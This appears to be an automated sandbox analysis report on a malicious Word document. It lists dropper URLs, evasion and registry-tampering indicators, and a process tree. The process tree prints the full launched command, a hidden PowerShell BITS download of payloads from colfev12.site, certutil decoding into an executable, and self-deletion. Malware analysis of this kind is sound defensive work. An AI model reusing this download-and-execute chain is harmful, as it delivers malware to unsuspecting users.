94c241402910892dc472c95bec71350b2201bb0b3216b0ea988782af6a05c08a

Analysis

max time kernel
143s
resource
win10v191014
submitted
05-12-2019 16:52

Sharing

Copy URL

Twitter E-mail

General

Target

Docs_92ebafcc950619596e93a4215d05e6cb.doc
Sample

191205-lskkescds6
SHA256

94c241402910892dc472c95bec71350b2201bb0b3216b0ea988782af6a05c08a

Score

10^/10

discovery evasion spreading spyware trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://colfev12.site/Bijka.dat

exe.dropper

http://colfev12.site/sfera.dat

exe.dropper

http://colfev12.site/oYWE.dat

Signatures

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

description	ioc
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6\Blob = 0300000001000000140000002c85006a1a028bcc349df23c474724c055fde8b620000000010000001f0300003082031b308202dba003020102020900bea900b78b6470ef300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3136303530393230343035355a170d3231303530383230343035355a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b73082012c06072a8648ce3804013082011f02818100a9a733a14a9c9d68b075811ddf231c514c0cdc328087287fd11f1d6eb125b536b88cd5579591bb6e7545b45b98eaa8cdeb0ae38be4781c7d36d97b3d2bb45b9449142130f68e112c6d09e343160cd0d0fbb8aabc8b0cea5b2066b0e3368589dadfd8ae79e9d2bdc5f5836d8fb278be02c260d3a592bda471f1a28e2f925e8b57021500a86236ce56c046d8f3fac8a6bb63e28543e45753028181009eb2085cfbe32af5a25dddeebdeede0d2f2a4475bbca802c7952e078421b4b85528fff6242aba7c75c1e40695db3be422d982972b638679c1b9314a39cad44577d2a71ee3e5738176062d9200be5efcc1b00c16b1b48e8b1771c01b9aa54ce0b5f6679caed531293d92ef822695e20264e23b188489ea3e6dc1c36a90fa0668903818400028180168cdc3d074cf4c9accef116317b85adf100f2454c9ca23203ad296928bb08879c48096c44bcb0dc3f49f69456e871dd45980eacabe735c63ade0281e7a48aca3eabde71aab64c04a6ef72c352be936692c8970a3c7615370d549b931c289810278f5284914f6965df0d93ce0a980ca5dce26e75a331c4da939af3e051d252d3a38198308195301d0603551d0e04160414a353ea5503cd0a69c45870b6ffe3912091c79f7a30530603551d23044c304a8014a353ea5503cd0a69c45870b6ffe3912091c79f7aa127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bea900b78b6470ef30120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c021468e7a7cdfca81ff04d476fa11b781b7696d1fbf402145ef1c64374ebde4c309b59a9deeb99e556fd1477
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060\Blob = 0300000001000000140000000217922ca1b6f0bd0f1d7ff6e7bdc29b2faaa06020000000010000001e0300003082031a308202daa003020102020900bebbcc34c2a99a43300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3133303730323231313033375a170d3138303730313231313033375a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b63082012b06072a8648ce3804013082011e02818100f3e2f36f1d350881275aa7c5f7e8c357a650ef20dc32b53ca779842dcbfc152228c1e764019c55ca7bf8a0116ccca93636dc681161c8188f79f985cce6b1a8aaf44dffd3ea6c2d60fd80eefd084c4a09c4b9784cf3ccf638ca8cca937fbaee6d472cad4ee2d5ddda4e653184e512d9846c770abdc5e4945ce5686c513bf38f150215009fd788154563df5ca8c78a354278fc70394e37fb0281803a769d0b37f784c6f1af668ffa7b2d0b53debfac0e64db8244f4c1793e9e34cac020047d3df0563ddefd171ab2fd6af49f7d3616c285cc422590c3a6f0cae0dd3987c3f310a5efe0f127f406416e983ec649e835e1006e2fccf48474b90e82cb67cb62608ed42f2ec45b71803d63dbd63101b8a490fd1ab091976ef4bb176a65038184000281806ed2b8b1d12b8846c32236833769cb554bcd3809bfd684c8bdacfb500ca500327185560ccc83d9ae13580fa72aa9fd36eccaa9fd79861245cc591b4e7dcf047847e82d5946829638473927236142f9aa5d99ec33714677492e39784264f486ada6b028837db599a58e512e376c52470b1cb8991793783499e772de6678db2be3a38198308195301d0603551d0e0416041446d2c25b3e033423792e171c0019284c71102b6430530603551d23044c304a801446d2c25b3e033423792e171c0019284c71102b64a127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bebbcc34c2a99a4330120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c02140b7937349b7de4b8750855cd40ef4bbb2d3145a9021417408a13071294c11b2c9e5195e411eb86a54864

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	svchost.exe

Checks for installed software on the system 1 TTPs 65 IoCs

discovery

Query Registry

T1012

Processes:

description	ioc
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}\DisplayName
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\DisplayName
Key opened	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName
Key opened	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\DisplayName
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2\DisplayName
Key opened	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName
Key opened	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\DisplayName
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime\DisplayName
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName
Key opened	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

SppExtComObj.exepowershell.exeblow.exeblow.execmd.exesvchost.exe

description	pid	process	target process
PID 1732 wrote to memory of 3796	1732	SppExtComObj.exe	SLUI.exe
PID 4260 wrote to memory of 4288	4260	powershell.exe	blow.exe
PID 4288 wrote to memory of 2496	4288	blow.exe	blow.exe
PID 2496 wrote to memory of 4848	2496	blow.exe	cmd.exe
PID 4848 wrote to memory of 768	4848	cmd.exe	PING.EXE
PID 3416 wrote to memory of 4936	3416	svchost.exe	WerFault.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 3416 created 2496 3416 svchost.exe blow.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exeblow.exeWerFault.exesvchost.exe

pid process

4548 powershell.exe
4260 powershell.exe
4288 blow.exe
4936 WerFault.exe
3416 svchost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

blow.exe

pid process

2496 blow.exe

description	pid	process	target process
PID 3416 created 2496	3416	svchost.exe	blow.exe

pid	process
4548	powershell.exe
4260	powershell.exe
4288	blow.exe
4936	WerFault.exe
3416	svchost.exe

pid	process
2496	blow.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeRestorePrivilege	4936	WerFault.exe
Token: SeBackupPrivilege	4936	WerFault.exe
Token: SeDebugPrivilege	4936	WerFault.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

4968 WINWORD.EXE
Executes dropped EXE 2 IoCs

Processes:

blow.exeblow.exe

pid process

4288 blow.exe
2496 blow.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

blow.exe

description pid process target process

PID 4288 set thread context of 2496 4288 blow.exe blow.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid process

4936 WerFault.exe
Runs ping.exe 1 TTPs 1 IoCs
evasion spreading

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

768 PING.EXE

pid	process
4968	WINWORD.EXE

pid	process
4288	blow.exe
2496	blow.exe

description	pid	process	target process
PID 4288 set thread context of 2496	4288	blow.exe	blow.exe

pid	process
4936	WerFault.exe

pid	process
768	PING.EXE

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

description	ioc
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4968 WINWORD.EXE

pid	process
4968	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_92ebafcc950619596e93a4215d05e6cb.doc" /o ""
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:4968

C:\Windows\system32\cmd.exe
cmd /c powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\" & certutil -decode %temp%\dera %temp%\dera.exe & powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
1⤵
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\system32\certutil.exe
certutil -decode C:\Users\Admin\AppData\Local\Temp\dera C:\Users\Admin\AppData\Local\Temp\dera.exe
2⤵
PID:4100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Users\Admin\AppData\Local\Temp\blow.exe
"C:\Users\Admin\AppData\Local\Temp\blow.exe" dera.exe
3⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4288

C:\Users\Admin\AppData\Local\Temp\blow.exe
"C:\Users\Admin\AppData\Local\Temp\blow.exe"
4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
PID:2496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\blow.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 1352
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Program crash
PID:4936

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in Windows directory
PID:4664

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4624

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
2⤵
PID:3796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3416

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
1⤵
PID:4388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:3792

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:668

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wisvc
1⤵
PID:388

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
PID:1900

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:2708

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
PID:4896

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER33DC.tmp.csv

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER33FC.tmp.txt

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Temp\blow.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\blow.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\blow.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\dera

Download Submit
C:\Users\Admin\AppData\Local\Temp\dera.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\oYWE.exe

Download Submit
memory/2496-10-0x0000000001150000-0x00000000011AD000-memory.dmp

Filesize
372KB

Download
memory/2496-12-0x0000000001150000-0x00000000011AD000-memory.dmp

Filesize
372KB

Download
memory/4936-16-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

Filesize
4KB

Download
memory/4936-17-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-18-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-20-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-22-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-24-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-26-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-28-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-30-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-32-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-34-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-36-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-38-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-40-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-42-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-44-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-46-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-48-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-50-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-51-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-53-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-54-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-55-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-56-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-58-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-59-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-61-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-62-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

Filesize
4KB

Download
memory/4936-63-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-66-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-67-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-70-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/4936-72-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-73-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/4936-74-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-75-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-76-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-77-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-78-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-79-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-80-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-81-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-82-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/4936-83-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
